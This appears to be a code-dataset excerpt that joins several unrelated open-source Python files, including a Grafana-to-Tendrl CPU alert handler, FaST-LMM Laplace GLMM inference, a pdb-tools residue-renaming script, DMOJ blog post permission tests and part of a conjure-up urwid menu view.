    # Resource name recorded on the produced Tendrl alert.
    representive_name = 'cpu_alert'

    def __init__(self):
        AlertHandler.__init__(self)
        # Graphite target pattern used to extract cluster id and host name.
        self.template = "tendrl.clusters.{cluster_id}.nodes.{host_name}.cpu"

    def format_alert(self, alert_json):
        """Build a Tendrl alert dict from a raw Grafana alert payload.

        Returns None (implicitly) and logs when the payload is malformed
        or carries an unsupported severity.
        """
        alert = self.parse_alert_metrics(alert_json)
        try:
            alert["alert_id"] = None
            alert["node_id"] = utils.find_node_id(
                alert['tags']['integration_id'],
                alert['tags']['fqdn']
            )
            alert["time_stamp"] = alert_json['NewStateDate']
            alert["resource"] = self.representive_name
            alert['alert_type'] = constants.ALERT_TYPE
            # Map Grafana state to Tendrl severity; KeyError here is caught
            # below for unknown states.
            alert['severity'] = constants.TENDRL_GRAFANA_SEVERITY_MAP[
                alert_json['State']]
            alert['significance'] = constants.SIGNIFICANCE_HIGH
            alert['pid'] = utils.find_grafana_pid()
            alert['source'] = constants.ALERT_SOURCE
            # NOTE(review): self-assignment — this line has no effect;
            # presumably a leftover from a normalization step. Confirm.
            alert['tags']['fqdn'] = alert['tags']['fqdn']
            alert['classification'] = alert_json["classification"]
            if alert['severity'] == "WARNING":
                alert['tags']['message'] = (
                    "Cpu utilization of node %s is"
                    " %s which is above the %s threshold (%s)." % (
                        alert['tags']['fqdn'],
                        alert['current_value'],
                        alert['severity'],
                        alert['tags']['warning_max']))
            elif alert['severity'] == "INFO":
                alert['tags']['message'] = ("Cpu utilization of node %s is"
                                            " back to normal" % (
                                                alert['tags']['fqdn']))
            else:
                logger.log(
                    "error",
                    NS.publisher_id,
                    {
                        "message": "Alert %s have unsupported alert"
                        "severity" % alert_json
                    }
                )
                raise InvalidAlertSeverity
            return alert
        except (KeyError,
                CalledProcessError,
                EtcdKeyNotFound,
                NodeNotFound,
                InvalidAlertSeverity) as ex:
            Event(
                ExceptionMessage(
                    "error",
                    NS.publisher_id,
                    {
                        "message": "Error in converting grafana"
                        "alert into tendrl alert %s" % alert_json,
                        "exception": ex
                    }
                )
            )

    def parse_alert_metrics(self, alert_json):
        """
        {
        "EvalData": {
            "evalMatches": [{
                "metric": "sumSeries(sumSeries(tendrl.clusters.ab3b125e-4769
                    -4071-a349-e82b380c11f4.nodes.{host_name}.
                    cpu.percent-system),sumSeries(tendrl.clusters.ab3b125e-4769-4071
                    -a349-e82b380c11f4.nodes.{host_name}.cpu.
                    percent-user))",
                "tags": null,
                "value": 31.97861830493573
            }]},
        "Settings": {
            "conditions": [{
                "evaluator": {
                    "params": [29],
                    "type": "gt"},
                query": {
                    "model": {
                        "target" : "sumSeries(#A, #B).select metric",
                        "targetFull": "sumSeries(sumSeries(tendrl.clusters.
                            ab3b125e-4769-4071-a349-e82b380c11f4.nodes.
                            {host_name}.cpu.percent-system),
                            sumSeries(tendrl.clusters.ab3b125e-4769-4071-a349-e82b
                            380c11f4.nodes.{host_name}.cpu.
                            percent-user)).select metric"
                    }
                }
            }]
          }
        }
        """
        alert = {}
        alert['tags'] = {}
        alert['current_value'] = utils.find_current_value(
            alert_json['EvalData'])
        target = utils.find_alert_target(
            alert_json['Settings']['conditions'])
        alert['tags']['warning_max'] = utils.find_warning_max(
            alert_json['Settings']['conditions'][0]['evaluator']['params'])
        # identifying cluster_id and node_id from target
        # Cpu target is an aggregation, So spliting and giving [0]
        # Because both have same cluster and node ids
        result = utils.parse_target(target, self.template)
        alert['tags']['integration_id'] = result["cluster_id"]
        alert["tags"]["fqdn"] = result["host_name"].replace("_", ".")
        return alert
| rishubhjain/monitoring-integration | tendrl/monitoring_integration/alert/handlers/node/cpu_handler.py | Python | lgpl-2.1 | 5,352 |
#
# Copyright (c) 2014 ThoughtWorks, Inc.
#
# Pixelated is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Pixelated is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Pixelated. If not, see <http://www.gnu.org/licenses/>.
import os
from twisted.internet.threads import deferToThread
from twisted.web.resource import Resource
from twisted.web.server import NOT_DONE_YET
from twisted.web.static import File
class LoadingResource(Resource):
    """Serves an interstitial 'loading' page (plus its assets) while the
    user agent starts up."""

    def __init__(self):
        Resource.__init__(self)
        self._path = os.path.dirname(os.path.abspath(__file__))
        self.putChild('assets', File(os.path.join(self._path, '..', 'assets')))

    def render_GET(self, request):
        def open_html():
            # Read in a worker thread so the reactor is not blocked by disk
            # I/O. BUG FIX: use a context manager so the file handle is
            # always closed — the original leaked it (open(...).read()).
            with open(os.path.join(self._path, '..', 'assets', 'Interstitial.html')) as html_file:
                return html_file.read()

        def close_request(html):
            request.responseHeaders.addRawHeader("Connection", "close")
            request.write(html)
            request.finish()

        d = deferToThread(open_html)
        d.addCallback(close_request)
        return NOT_DONE_YET

    def getChild(self, path, request):
        # Serve this resource for the bare path; defer to children otherwise.
        if path == '':
            return self
        return Resource.getChild(self, path, request)
| alabeduarte/pixelated-user-agent | service/pixelated/resources/loading_page.py | Python | agpl-3.0 | 1,677 |
from fastlmm import Pr
import scipy as sp
import numpy as NP
from numpy import dot
import scipy.integrate
from scipy.linalg import cholesky,solve_triangular
from fastlmm.external.util.math import check_definite_positiveness,check_symmetry,mvnormpdf,ddot,trace2,dotd
from fastlmm.external.util.math import stl, stu
from fastlmm.inference.glmm import GLMM_N1K3, GLMM_N3K1
from fastlmm.inference.likelihood import LogitLikelihood, ProbitLikelihood
import sys
'''
Important! Always run test.py in the current folder for unit testing after
changes have been made.
'''
class DebugUACall(object):
    """Immutable-by-convention snapshot of one update-approximation call.

    Instances are collected when debugging is enabled and later summarised
    by LaplaceGLMM.printDebug().
    """

    def __init__(self, innerIters, lastGrad, success, beta, sig02, sig12, sign2):
        # Store every argument verbatim under its own name.
        fields = (('innerIters', innerIters), ('lastGrad', lastGrad),
                  ('success', success), ('beta', beta),
                  ('sig02', sig02), ('sig12', sig12), ('sign2', sign2))
        for name, value in fields:
            setattr(self, name, value)
class LaplaceGLMM(object):
    """Base class for Laplace-approximation inference in a binary GLMM.

    The posterior over latent effects is approximated by a Gaussian centred
    at the mode of log p(F|X,y); the mode is found by damped Newton
    iterations in _updateApproximation().  Subclasses supply the kernel
    algebra (_rdotK, _calculateUAa, _updateApproximationBegin/End, ...).
    """

    def __init__(self, link):
        # `link` chooses the observation likelihood for the binary labels.
        self._lasta = None          # warm-start dual vector for the Newton solve
        self._debugUACalls = []     # DebugUACall records when debugging is on
        self._link = link
        if link == "logistic":
            self._likelihood = LogitLikelihood()
        elif link == "erf":
            self._likelihood = ProbitLikelihood()
        else:
            assert False, "Unknown link function."

    def _calculateW(self, f):
        # W is the diagonal of the negative Hessian of log p(y|f).
        W = -self._likelihood.hessian_log(f)
        return W

    def _lineSearch(self, a, aprev, m):
        # Brent line search along the Newton direction da = a - aprev;
        # fobj is the negated objective, so brent() minimises it.
        da = a - aprev
        def fobj(alpha):
            a = aprev + alpha*da
            f = self._rdotK(a) + m
            return -(self._likelihood.log(f, self._y) - (f-m).dot(a)/2.0)
        (alpha,obj,iter,funcalls) = sp.optimize.brent(fobj, brack=(0.0,1.0), full_output=True, tol=1e-4, maxiter=10)
        obj = -obj  # undo the negation to report the maximised objective
        a = aprev + alpha*da
        f = self._rdotK(a) + m
        return (f, a, obj)

    def _calculateUAGrad(self, f, a):
        # Gradient of the mode-finding objective; zero at the posterior mode.
        grad = self._likelihood.gradient_log(f, self._y) - a
        return grad

    def printDebug(self):
        """Print summary statistics of the recorded update-approximation calls."""
        assert self._debug is True
        from tabulate import tabulate
        iters = [self._debugUACalls[i].innerIters for i in range(len(self._debugUACalls))]
        sig02 = [self._debugUACalls[i].sig02 for i in range(len(self._debugUACalls))]
        sig12 = [self._debugUACalls[i].sig12 for i in range(len(self._debugUACalls))]
        sign2 = [self._debugUACalls[i].sign2 for i in range(len(self._debugUACalls))]
        gradMeans = [NP.mean(abs(self._debugUACalls[i].lastGrad)) for i in range(len(self._debugUACalls))]
        Pr.prin("*** Update approximation ***")
        Pr.prin("calls: %d" % (len(self._debugUACalls),))
        table = [["", "min", "max", "mean"],
                 ["iters", min(iters), max(iters), NP.mean(iters)],
                 ["|grad|_{mean}", min(gradMeans), max(gradMeans), NP.mean(gradMeans)],
                 ["sig01", min(sig02), max(sig02), NP.mean(sig02)],
                 ["sig11", min(sig12), max(sig12), NP.mean(sig12)],
                 ["sign1", min(sign2), max(sign2), NP.mean(sign2)]]
        Pr.prin(tabulate(table))

    def _updateApproximation(self):
        '''
        Calculates the Laplace approximation for the posterior.
        It can be defined by two variables: f mode and W at f mode.
        '''
        # Skip if nothing changed since the last call, or the kernel is zero.
        if self._updateApproximationCount == 0:
            return
        if self._is_kernel_zero():
            self._updateApproximationCount = 0
            return
        self._updateApproximationBegin()
        # Tolerances: stop on tiny gradient/objective change; error out if the
        # final gradient is still large.
        gradEpsStop = 1e-10
        objEpsStop = 1e-8
        gradEpsErr = 1e-3
        self._mean = self._calculateMean()
        m = self._mean
        # Warm-start from the previous solution when its size still matches.
        if self._lasta is None or self._lasta.shape[0] != self._N:
            aprev = NP.zeros(self._N)
        else:
            aprev = self._lasta
        fprev = self._rdotK(aprev) + m
        objprev = self._likelihood.log(fprev, self._y) - (fprev-m).dot(aprev)/2.0
        ii = 0
        line_search = False  # enabled only after a plain Newton step fails
        maxIter = 1000
        failed = False
        failedMsg = ''
        while ii < maxIter:
            grad = self._calculateUAGrad(fprev, aprev)
            if NP.mean(abs(grad)) < gradEpsStop:
                a = aprev
                f = fprev
                break
            # The following is just a Newton step (eq. (3.18) [1]) to maximize
            # log(p(F|X,y)) over F
            g = self._likelihood.gradient_log(fprev, self._y)
            W = self._calculateW(fprev)
            b = W*(fprev-m) + g
            a = self._calculateUAa(b, W)
            if line_search:
                (f, a, obj) = self._lineSearch(a, aprev, m)
            else:
                f = self._rdotK(a) + m
                obj = self._likelihood.log(f, self._y) - (f-m).dot(a)/2.0
            if abs(objprev-obj) < objEpsStop :
                grad = self._calculateUAGrad(f, a)
                break
            if obj > objprev:
                # Accept the step.
                fprev = f
                objprev = obj
                aprev = a
            else:
                # Step made things worse: if a line search already failed too,
                # give up with the previous iterate; otherwise retry with one.
                if line_search:
                    grad = self._calculateUAGrad(fprev, aprev)
                    a = aprev
                    f = fprev
                    break
                line_search = True
            ii+=1
        self._lasta = a  # remember for warm-starting the next call
        err = NP.mean(abs(grad))
        if err > gradEpsErr:
            failed = True
            failedMsg = 'Gradient not too small in the Laplace update approximation.\n'
            failedMsg = failedMsg+"Problem in the f mode estimation. |grad|_{mean} = %.6f." % (err,)
        if ii>=maxIter:
            failed = True
            failedMsg = 'Laplace update approximation did not converge in less than maxIter.'
        if self._debug:
            # NOTE(review): DebugUACall is defined at module level; resolving it
            # through `self.` only works if a base class exposes it as an
            # attribute -- verify this path under _debug=True.
            self._debugUACalls.append(self.DebugUACall(
                ii, grad, not failed, self.beta, self._sig02, self._sig12, self._sign2))
        if failed:
            Pr.prin('Laplace update approximation failed. The failure message is the following.')
            Pr.prin(failedMsg)
            sys.exit('Stopping program.')
        self._updateApproximationEnd(f, a)
        self._updateApproximationCount = 0

    def _predict(self, meanstar, kstar, kstarstar, prob):
        # Refresh constants/approximation, then predict one or many points.
        self._updateConstants()
        self._updateApproximation()
        if NP.isscalar(kstarstar):
            return self._predict_each(meanstar, kstar, kstarstar, prob)
        n = len(kstarstar)
        ps = NP.zeros(n)
        for i in xrange(n):  # Python 2 module (xrange)
            ps[i] = self._predict_each(meanstar[i], kstar[i,:], kstarstar[i], prob)
        return ps
class LaplaceGLMM_N1K3(GLMM_N1K3, LaplaceGLMM):
    """Laplace GLMM specialised for the low-rank ("N1K3") kernel layout.

    The covariance is represented through the stacked factor G01, so linear
    solves use the small Cholesky factor Lk instead of an NxN factorisation.
    """

    def __init__(self, link, penalty=None, penalizeBias=False, debug=False):
        GLMM_N1K3.__init__(self, penalty=penalty, penalizeBias=penalizeBias, debug=debug)
        LaplaceGLMM.__init__(self, link)
        self._link = link

    def _updateApproximationBegin(self):
        # Recompute the stacked kernel factor before the Newton iterations.
        self._G01 = self._calculateG01()

    def _calculateUAa(self, b, W):
        # Solve (K + W^-1)^-1 ... for the Newton step using the low-rank
        # factorisation (Woodbury-style), avoiding an NxN inverse.
        A = 1.0 + W*self._sign2
        V = W/A
        Lk = self._calculateLk(self._G01, V)
        Gtb = dot(self._G01.T, b)
        GtV = ddot(self._G01.T, V, left=False)
        LtLGtV = stu(Lk.T, stl(Lk, GtV))
        LtLGtVG = dot(LtLGtV, self._G01)
        bn = self._sign2*b
        a = b + dot(dot(GtV.T, LtLGtVG) - GtV.T, Gtb)\
            + dot(GtV.T, dot(LtLGtV, bn)) - V*bn
        return a

    def _updateApproximationEnd(self, f, a):
        # Cache mode-dependent quantities reused by likelihood/gradient code.
        self._f = f
        self._a = a
        self._W = self._calculateW(f)
        self._Wsq = NP.sqrt(self._W)
        self._A = 1.0 + self._W * self._sign2
        self._V = self._W/self._A
        self._Lk = self._calculateLk(self._G01, self._V)

    def _updateApproximation(self):
        # Delegate explicitly to the Laplace base (bypasses MRO ambiguity).
        LaplaceGLMM._updateApproximation(self)

    def _regular_marginal_loglikelihood(self):
        """Approximate log marginal likelihood at the current mode."""
        self._updateConstants()
        self._updateApproximation()
        if self._is_kernel_zero():
            return self._likelihood.log(self._mean, self._y)
        (f,a) = (self._f,self._a)
        loglike = self._likelihood.log(f, self._y)
        # log-determinant terms come from Lk's diagonal and A.
        r = loglike - dot(f-self._mean,a)/2.0 - sum(NP.log(NP.diag(self._Lk)))\
            - sum(NP.log( self._A ))/2.0
        assert NP.isfinite(r), 'Not finite regular marginal loglikelihood.'
        return r

    def _rmll_gradient(self, optSig02=True, optSig12=True, optSign2=True, optBeta=True):
        """Gradient of the marginal log-likelihood w.r.t. the selected
        hyperparameters (sig02, sig12, sign2) and/or beta, in that order."""
        self._updateConstants()
        self._updateApproximation()
        (f,a)=(self._f,self._a)
        (W,Wsq) = (self._W,self._Wsq)
        Lk = self._Lk
        m = self._mean
        X = self._X
        G0 = self._G0
        G1 = self._G1
        sign2 = self._sign2
        G01 = self._G01
        #g = self._likelihood.gradient_log(f)
        #a==g
        h = self._likelihood.third_derivative_log(f)
        V = W/self._A
        d = self._dKn()
        G01tV = ddot(G01.T, V, left=False)
        H = stl(Lk, G01tV)
        dkH = self._ldotK(H)
        # diag of the implicit-derivative correction, scaled by the third
        # derivative of the log-likelihood.
        diags = (d - sign2**2 * V - dotd(G01, dot(dot(G01tV, G01), G01.T))\
                 - 2.0*sign2*dotd(G01, G01tV) + dotd(dkH.T, dkH)) * h
        ret = []
        if optSig02:
            dK0a = dot(G0, dot(G0.T, a))
            t = V*dK0a - dot(H.T, dot(H, dK0a))
            dF0 = dK0a - self._rdotK(t)
            LkG01VG0 = dot(H, G0)
            VG0 = ddot(V, G0, left=True)
            ret0 = dot(a, dF0) - 0.5*dot(a, dK0a) + dot(f-m, t)\
                   + 0.5*NP.sum( diags*dF0 )\
                   + -0.5*trace2(VG0, G0.T) + 0.5*trace2( LkG01VG0.T, LkG01VG0 )
            ret.append(ret0)
        if optSig12:
            dK1a = dot(G1, dot(G1.T, a))
            t = V*dK1a - dot(H.T, dot(H, dK1a))
            dF1 = dK1a - self._rdotK(t)
            LkG01VG1 = dot(H, G1)
            VG1 = ddot(V, G1, left=True)
            ret1 = dot(a, dF1)- 0.5*dot(a, dK1a) + dot(f-m, t)\
                   + 0.5*NP.sum( diags*dF1 )\
                   + -0.5*trace2(VG1, G1.T) + 0.5*trace2( LkG01VG1.T, LkG01VG1 )
            ret.append(ret1)
        if optSign2:
            t = V*a - dot(H.T, dot(H, a))
            dFn = a - self._rdotK(t)
            retn = dot(a, dFn)- 0.5*dot(a, a) + dot(f-m, t)\
                   + 0.5*NP.sum( diags*dFn )\
                   + -0.5*NP.sum(V) + 0.5*trace2( H.T, H )
            ret.append(retn)
        if optBeta:
            t = ddot(V, X, left=True) - dot(H.T, dot(H, X))
            dFbeta = X - self._rdotK(t)
            retbeta = dot(a, dFbeta) + dot(f-m, t)
            for i in range(dFbeta.shape[1]):
                retbeta[i] += 0.5*NP.sum( diags*dFbeta[:,i] )
            ret.extend(retbeta)
        ret = NP.array(ret)
        assert NP.all(NP.isfinite(ret)), 'Not finite regular marginal loglikelihood gradient.'
        return ret

    def _predict(self, meanstar, kstar, kstarstar, prob):
        # Delegate explicitly to the Laplace base implementation.
        return LaplaceGLMM._predict(self, meanstar, kstar, kstarstar, prob)

    def _predict_each(self, meanstar, kstar, xstarstar, prob):
        '''
        Calculates the probability of being 1, or the most probable label
        if prob=False.
        --------------------------------------------------------------------------
        Input:
        meanstar    : input mean.
        kstar       : covariance between provided and prior latent variables.
        xstarstar   : variance of the latent variable.
        prob        : True for probability calculation or False for returning
                      the most probable label.
        '''
        a = self._a
        fstarmean = meanstar + kstar.dot(a)
        if prob is False:
            # Labels are encoded as +/-1; sign of the latent mean decides.
            if fstarmean > 0.0:
                return +1.0
            return -1.0
        r0Tr0 = kstar.dot(self._V*kstar)
        r1 = stl(self._Lk, dot(self._G01.T, self._V*kstar))
        fstarvar = xstarstar - r0Tr0 + r1.dot(r1)
        return self._likelihood.intOverGauss(fstarmean, fstarvar)
class LaplaceGLMM_N3K1(GLMM_N3K1, LaplaceGLMM):
    """Laplace GLMM specialised for the dense NxN ("N3K1") kernel layout.

    The full covariance K is materialised and solves go through the NxN
    Cholesky factor Ln.
    """

    def __init__(self, link, penalty=None, penalizeBias=False, debug=False):
        GLMM_N3K1.__init__(self, penalty=penalty, penalizeBias=penalizeBias, debug=debug)
        LaplaceGLMM.__init__(self, link)
        self._link = link

    def _updateApproximationBegin(self):
        # Assemble the dense covariance: noise + optional K0/K1 components.
        self._K = NP.eye(self._N) * self._sign2
        if self._isK0Set:
            self._K += self._sig02*(dot(self._G0, self._G0.T))
        if self._isK1Set:
            self._K += self._sig12*(dot(self._G1, self._G1.T))

    def _calculateUAa(self, b, W):
        # Newton step via the dense Cholesky of (I + Wsq K Wsq).
        Wsq = NP.sqrt(W)
        Ln = self._calculateLn(self._K, Wsq)
        a = b - Wsq * stu(Ln.T, stl(Ln, Wsq*dot(self._K,b)))
        return a

    def _updateApproximationEnd(self, f, a):
        # Cache mode-dependent quantities reused by likelihood/gradient code.
        self._f = f
        self._a = a
        self._W = self._calculateW(f)
        self._Wsq = NP.sqrt(self._W)
        self._A = 1.0 + self._W * self._sign2
        # NOTE(review): V is computed here but never stored or used -- confirm
        # whether self._V was intended (as in the N1K3 variant).
        V = self._W/self._A
        self._Ln = self._calculateLn(self._K, self._Wsq)

    def _regular_marginal_loglikelihood(self):
        """Approximate log marginal likelihood at the current mode."""
        self._updateConstants()
        self._updateApproximation()
        if self._is_kernel_zero():
            return self._likelihood.log(self._mean, self._y)
        (f,a) = (self._f,self._a)
        loglike = self._likelihood.log(f, self._y)
        r = loglike - dot(f-self._mean,a)/2.0 - sum(NP.log(NP.diag(self._Ln)))
        assert NP.isfinite(r), 'Not finite regular marginal loglikelihood.'
        return r

    def _rmll_gradient(self, optSig02=True, optSig12=True, optSign2=True, optBeta=True):
        """Gradient of the marginal log-likelihood w.r.t. the selected
        hyperparameters (sig02, sig12, sign2) and/or beta, in that order."""
        self._updateConstants()
        self._updateApproximation()
        W = self._W
        Wsq = self._Wsq
        f = self._f
        K = self._K
        K0 = self._K0
        K1 = self._K1
        m = self._mean
        a = self._a
        Ln = self._Ln
        X = self._X
        LnWsq = stl(Ln, NP.diag(Wsq))
        LnWsqK = dot(LnWsq, K)
        d = self._dKn()
        h = self._likelihood.third_derivative_log(f)
        diags = (d - dotd(LnWsqK.T, LnWsqK)) * h
        ret = []
        if optSig02:
            dK0a = dot(K0, a)
            dF0 = dK0a - dot(LnWsqK.T, dot(LnWsq, dK0a))
            # NOTE(review): the first two terms cancel exactly
            # (dot(a, dF0) - dot(a, dF0)); verify against the N1K3 variant,
            # which keeps dot(a, dF0) and subtracts 0.5*dot(a, dK0a).
            r = dot(a, dF0) - dot(a, dF0) + 0.5*dot(a, dK0a)\
                + 0.5*NP.sum( diags*dF0 )\
                - 0.5*trace2( LnWsq.T, dot(LnWsq,K0) )
            ret.append(r)
        if optSig12:
            dK1a = dot(K1, a)
            dF1 = dK1a - dot(LnWsqK.T, dot(LnWsq, dK1a))
            r = dot(a, dF1) - dot(a, dF1) + 0.5*dot(a, dK1a)\
                + 0.5*NP.sum( diags*dF1 )\
                - 0.5*trace2( LnWsq.T, dot(LnWsq,K1) )
            ret.append(r)
        if optSign2:
            dFn = a - dot(LnWsqK.T, dot(LnWsq, a))
            r = dot(a, dFn) - dot(a, dFn) + 0.5*dot(a, a)\
                + 0.5*NP.sum( diags*dFn )\
                - 0.5*trace2( LnWsq.T, LnWsq )
            ret.append(r)
        if optBeta:
            dFmb = -dot(LnWsqK.T, dot(LnWsq, X))
            dFb = dFmb+X
            r = dot(a, dFb) - dot(a, dFmb)\
                + 0.5*NP.sum( diags*dFb.T, 1)
            ret += list(r)
        ret = NP.array(ret)
        assert NP.all(NP.isfinite(ret)), 'Not finite regular marginal loglikelihood gradient.'
        return ret

    def _updateApproximation(self):
        # Delegate explicitly to the Laplace base (bypasses MRO ambiguity).
        LaplaceGLMM._updateApproximation(self)

    def _predict(self, meanstar, kstar, kstarstar, prob):
        # Delegate explicitly to the Laplace base implementation.
        return LaplaceGLMM._predict(self, meanstar, kstar, kstarstar, prob)

    def _predict_each(self, meanstar, kstar, xstarstar, prob):
        '''
        Calculates the probability of being 1, or the most probable label
        if prob=False.
        --------------------------------------------------------------------------
        Input:
        meanstar    : input mean.
        kstar       : covariance between provided and prior latent variables.
        xstarstar   : variance of the latent variable.
        prob        : True for probability calculation or False for returning
                      the most probable label.
        '''
        fstarmean = meanstar + kstar.dot(self._a)
        if prob is False:
            # Labels are encoded as +/-1; sign of the latent mean decides.
            if fstarmean > 0.0:
                return +1.0
            return -1.0
        r = stl(self._Ln, self._Wsq*kstar)
        fstarvar = xstarstar - dot(r,r)
        return self._likelihood.intOverGauss(fstarmean, fstarvar)
| MicrosoftGenomics/FaST-LMM | fastlmm/inference/laplace.py | Python | apache-2.0 | 16,247 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2018 João Pedro Rodrigues
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Performs in-place replacement of a residue name by another.
Affects all residues with that name.
Usage:
python pdb_rplresname.py -<from>:<to> <pdb file>
Example:
python pdb_rplresname.py -HIP:HIS 1CTF.pdb # changes all HIP residues to HIS
This program is part of the `pdb-tools` suite of utilities and should not be
distributed isolatedly. The `pdb-tools` were created to quickly manipulate PDB
files using the terminal, and can be used sequentially, with one tool streaming
data to another. They are based on old FORTRAN77 code that was taking too much
effort to maintain and compile. RIP.
"""
import os
import sys
__author__ = ["Joao Rodrigues", "Joao M.C. Teixeira"]
__email__ = ["j.p.g.l.m.rodrigues@gmail.com", "joaomcteixeira@gmail.com"]
def check_input(args):
    """Checks whether to read from stdin/file and validates user input/options.
    """
    option = ''
    fh = sys.stdin  # default: PDB data arrives on a pipe

    def _usage_error(message):
        # Emit the error plus the module usage text, then abort.
        sys.stderr.write(message)
        sys.stderr.write(__doc__)
        sys.exit(1)

    if len(args) == 1:
        # Option only; PDB data must come from stdin.
        if not args[0].startswith('-'):
            _usage_error('ERROR!! Option not valid: \'{}\'\n'.format(args[0]))
        option = args[0][1:]
        if sys.stdin.isatty():  # nothing piped in
            _usage_error('ERROR!! No data to process!\n')
    elif len(args) == 2:
        # Option followed by an input file.
        if not args[0].startswith('-'):
            _usage_error(
                'ERROR! First argument is not an option: \'{}\'\n'.format(args[0]))
        if not os.path.isfile(args[1]):
            _usage_error(
                'ERROR!! File not found or not readable: \'{}\'\n'.format(args[1]))
        option = args[0][1:]
        fh = open(args[1], 'r')
    else:
        # Anything else: just show usage.
        _usage_error('')

    # Validate the <from>:<to> option format.
    if option.count(':') != 1 and len(option.split(':')) != 2:
        sys.stderr.write('ERROR!! Invalid option value: \'{}\'\n'.format(option))
        sys.exit(1)

    name_from, name_to = option.split(':')
    for name in (name_from, name_to):
        if not (1 <= len(name) <= 3):
            sys.stderr.write(
                'ERROR!! Residue names must have one to three characters: \'{}\''.format(name))
            sys.exit(1)

    return (name_from, name_to, fh)
def rename_residues(fhandle, name_from, name_to):
    """Changes the residue name of residues matching a pattern to another.

    Yields every line of the input, rewriting the residue-name columns
    (18-20) of coordinate records whose residue name equals `name_from`.
    """
    coordinate_records = ('ATOM', 'HETATM', 'TER', 'ANISOU')
    padded_to = name_to.rjust(3)  # right-justified per PDB column rules
    for line in fhandle:
        matches = (line.startswith(coordinate_records)
                   and line[17:20].strip() == name_from)
        if matches:
            yield line[:17] + padded_to + line[20:]
        else:
            yield line
def main():
    """Entry point: validate args, rewrite residue names, stream to stdout."""
    # Check Input
    name_from, name_to, pdbfh = check_input(sys.argv[1:])

    # Do the job
    new_pdb = rename_residues(pdbfh, name_from, name_to)

    # Output results
    try:
        _buffer = []
        _buffer_size = 5000  # write N lines at a time
        for lineno, line in enumerate(new_pdb):
            if not (lineno % _buffer_size):
                sys.stdout.write(''.join(_buffer))
                _buffer = []
            _buffer.append(line)

        sys.stdout.write(''.join(_buffer))
        sys.stdout.flush()
    except IOError:
        # This is here to catch Broken Pipes
        # for example to use 'head' or 'tail' without
        # the error message showing up
        pass

    # last line of the script
    # Close file handle even if it is sys.stdin, no problem here.
    pdbfh.close()
    sys.exit(0)


if __name__ == '__main__':
    main()
| JoaoRodrigues/pdb-tools | pdbtools/pdb_rplresname.py | Python | apache-2.0 | 4,763 |
from django.test import TestCase
from judge.models.tests.util import CommonDataMixin, create_blogpost, create_user
class BlogPostTestCase(CommonDataMixin, TestCase):
    """Permission tests for blog posts: visibility and editability per user."""

    @classmethod
    def setUpTestData(cls):
        # Fix: the first parameter of a classmethod is conventionally `cls`
        # (PEP 8); the original named it `self`, which obscured that these
        # fixtures are class attributes shared across the test methods.
        super().setUpTestData()
        cls.users.update({
            'staff_blogpost_edit_own': create_user(
                username='staff_blogpost_edit_own',
                is_staff=True,
                user_permissions=('change_blogpost',),
            ),
            'staff_blogpost_edit_all': create_user(
                username='staff_blogpost_edit_all',
                is_staff=True,
                user_permissions=('change_blogpost', 'edit_all_post'),
            ),
        })

        # A non-visible post authored by the "edit own" staff user.
        cls.basic_blogpost = create_blogpost(
            title='basic',
            authors=('staff_blogpost_edit_own',),
        )

        # A visible post with no authors.
        cls.visible_blogpost = create_blogpost(
            title='visible',
            visible=True,
        )

    def test_basic_blogpost(self):
        # str() of a post is its title.
        self.assertEqual(str(self.basic_blogpost), self.basic_blogpost.title)

    def test_basic_blogpost_methods(self):
        # Hidden post: only superusers and staff with blogpost permissions
        # may see it; authors and edit-all staff may edit it.
        data = {
            'superuser': {
                'can_see': self.assertTrue,
                'is_editable_by': self.assertTrue,
            },
            'staff_blogpost_edit_own': {
                'can_see': self.assertTrue,
                'is_editable_by': self.assertTrue,
            },
            'staff_blogpost_edit_all': {
                'can_see': self.assertTrue,
                'is_editable_by': self.assertTrue,
            },
            'normal': {
                'can_see': self.assertFalse,
                'is_editable_by': self.assertFalse,
            },
            'anonymous': {
                'can_see': self.assertFalse,
                'is_editable_by': self.assertFalse,
            },
        }
        self._test_object_methods_with_users(self.basic_blogpost, data)

    def test_visible_blogpost_methods(self):
        # Visible post: everyone can see it; only the superuser can edit,
        # since the "edit own" staff user is not an author of this post.
        data = {
            'superuser': {
                'can_see': self.assertTrue,
                'is_editable_by': self.assertTrue,
            },
            'staff_blogpost_edit_own': {
                'can_see': self.assertTrue,
                'is_editable_by': self.assertFalse,
            },
            'normal': {
                'can_see': self.assertTrue,
                'is_editable_by': self.assertFalse,
            },
            'anonymous': {
                'can_see': self.assertTrue,
                'is_editable_by': self.assertFalse,
            },
        }
        self._test_object_methods_with_users(self.visible_blogpost, data)
| DMOJ/site | judge/models/tests/test_blogpost.py | Python | agpl-3.0 | 2,642 |
from __future__ import unicode_literals
from ubuntui.ev import EventLoop
from ubuntui.utils import Color, Padding
from ubuntui.widgets.buttons import menu_btn, quit_btn
from urwid import Columns, Filler, Pile, Text, WidgetWrap
from conjureup.app_config import app
class VariantView(WidgetWrap):
    """Scrollable menu of available bundles; invokes `cb` with the chosen one."""

    def __init__(self, cb):
        self.cb = cb
        self.fname_id_map = {}       # friendly name -> bundle dict
        self.current_focus = 2
        body = Pile([
            Padding.line_break(""),
            Padding.center_90(self.build_menuable_items()),
            Padding.line_break(""),
            Padding.center_20(self.buttons())
        ])
        super().__init__(Filler(body, valign="top"))

    def _swap_focus(self):
        # Toggle between the bundle menu (pile slot 2) and buttons (slot 4).
        pile = self._w.body
        pile.focus_position = 4 if pile.focus_position == 2 else 2

    def keypress(self, size, key):
        if key in ['tab', 'shift tab']:
            self._swap_focus()
        return super().keypress(size, key)

    def buttons(self):
        # Single "quit" button styled as a secondary action.
        cancel = quit_btn(on_press=self.cancel)
        return Pile([
            Color.button_secondary(cancel, focus_map='button_secondary focus')
        ])

    def build_menuable_items(self):
